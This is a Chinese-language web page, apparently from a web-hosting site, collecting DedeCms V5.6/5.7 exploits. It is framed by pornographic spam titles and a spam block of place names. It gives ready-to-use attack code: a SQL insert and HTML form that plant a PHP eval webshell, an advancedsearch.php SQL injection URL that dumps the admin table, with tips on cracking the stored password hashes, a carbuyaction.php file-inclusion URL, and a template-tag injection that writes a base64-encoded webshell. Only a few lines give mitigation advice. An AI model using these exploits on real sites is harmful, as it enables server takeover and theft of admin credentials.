校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

主頁 > 網站建設 > 建站知識 > Dedecms V5.6/V5.7漏洞問題收集總結

Dedecms V5.6/V5.7漏洞問題收集總結

POST TIME:2020-04-13 22:38

DedeCms v5.6-5.7 最新漏洞 拿 WebShell EXP (5.18)

前題條件,必須準備好自己的dede,然后插入數據:

以下是引用片段:

代碼如下  

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @("1.php", 'a');@fwrite($fp, '<?php eval($_POST[c]) ?>');echo "OK";@fclose($fp);{/dede:php}');

再用下面表單提交,shell 就在同目錄下 1.php。原理自己研究。。。

以下是引用片段:

代碼如下  

<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

此問題官方還沒有解決辦法,個人建義刪除mytag_js.php文件,并把數據表中的XX_mytag表的中的text類開的字段修改,并且限制最多為1字節,如果你不使用這個功能。

DedeCms V5.6注入+本地包含0day

一、advancedsearch.php注入0day

代碼如下  
plus/advancedsearch.php

$sql 變量未初始化。導致雞助注入。

原理不多說自已百度去,直接EXP:

代碼如下  
http://www.xxx.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

dede的密碼破解方法是32位MD5減去頭5位,減去尾七位,得到20MD5密碼,方法是,前減3后減1,得到16位MD5。

二、carbuyaction.php本地包含雞助0day

漏洞文件:plus/carbuyaction.php

還是原理不多說自已百度去,直接EXP:

代碼如下  
http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../

如果打了補丁在cookie中加上code=alipay繼續使用。
再暴一個BUG,直接訪問:

代碼如下  
http://www.dedecms.com/plus/carbuyaction.php?dopost=return&dsql=xx

暫時沒什么利用價植,BUG一個。

DedeCms v5.6 惡意代碼執行漏洞

影響版本:

DedeCms v5.6漏洞描述:
在上傳軟件的地方,對本地地址沒有進行有效的驗證,可以被惡意利用
測試方法:
注冊會員,上傳軟件:本地地址中填入

代碼如下  
a{/dede:link}{dede:toby57 name="'']=0;phpinfo();//"}x{/dede:toby57},

發表后查看或修改即可執行

代碼如下  

a{/dede:link}{dede:toby57 name="'']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

生成x.php 密碼:xiao直接生成一句話。密碼xiao 大家懂得SEBUG安全建議:
廠商補丁:
DEDECMS
目前廠商還沒有提供補丁或者升級程序,我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本

個人教訓:我們可把upload,data目錄設置不可執行和php文件,plus目錄設置不要寫任何文件,把不要的文件刪除,模板目錄最好也不可以上傳和修改任何文件。



收縮
  • 微信客服
  • 微信二維碼
  • 電話咨詢

  • 400-1100-266
主站蜘蛛池模板: 玛曲县| 湖南省| 安西县| 赤峰市| 吐鲁番市| 乌什县| 蓬莱市| 古浪县| 策勒县| 元氏县| 安塞县| 武邑县| 云浮市| 青阳县| 玉山县| 深州市| 大姚县| 德安县| 宁波市| 渝北区| 大安市| 濮阳市| 米泉市| 亳州市| 呼玛县| 吴忠市| 固原市| 罗江县| 大荔县| 民县| 都江堰市| 彭水| 京山县| 平度市| 彝良县| 彭水| 涟源市| 巍山| 闽清县| 马山县| 龙川县|